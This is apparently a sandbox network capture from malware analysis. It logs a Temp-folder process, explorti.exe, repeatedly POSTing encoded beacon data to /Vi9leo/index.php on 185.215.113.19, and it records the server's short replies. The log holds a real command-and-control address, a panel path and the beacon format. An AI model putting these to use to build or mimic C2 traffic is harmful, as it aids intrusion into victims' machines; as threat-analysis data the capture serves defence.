Jul 26, 2024 21:01:37.028063059 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:37.286619902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49764	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:37.396255016 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:38.209861040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:38.211549997 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:38.461919069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:38.582405090 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:39.342123985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:39.343060017 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:39.589071989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49766	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:39.706770897 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:40.486973047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:40.487821102 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:40.738691092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49767	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:40.849365950 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:41.596596003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:41.597368002 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:41.880871058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49768	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:41.991230011 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:42.776576996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:42.777374029 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:43.104305983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49769	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:43.222672939 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:43.981633902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:43.983478069 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:44.653028965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 21:01:44.654983997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49770	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:44.769330025 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:45.609498024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:45.610388994 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:45.880726099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49771	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:45.991903067 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:46.793958902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:46.794943094 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:47.069297075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49772	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:47.198471069 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:48.071032047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:48.071986914 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:48.355564117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49773	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:48.477911949 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:49.567173958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:49.567883968 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:49.568111897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:49.841043949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49774	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:49.959379911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:50.742084026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:50.742983103 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:50.987119913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49775	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:51.103940010 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:51.875744104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:51.877486944 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
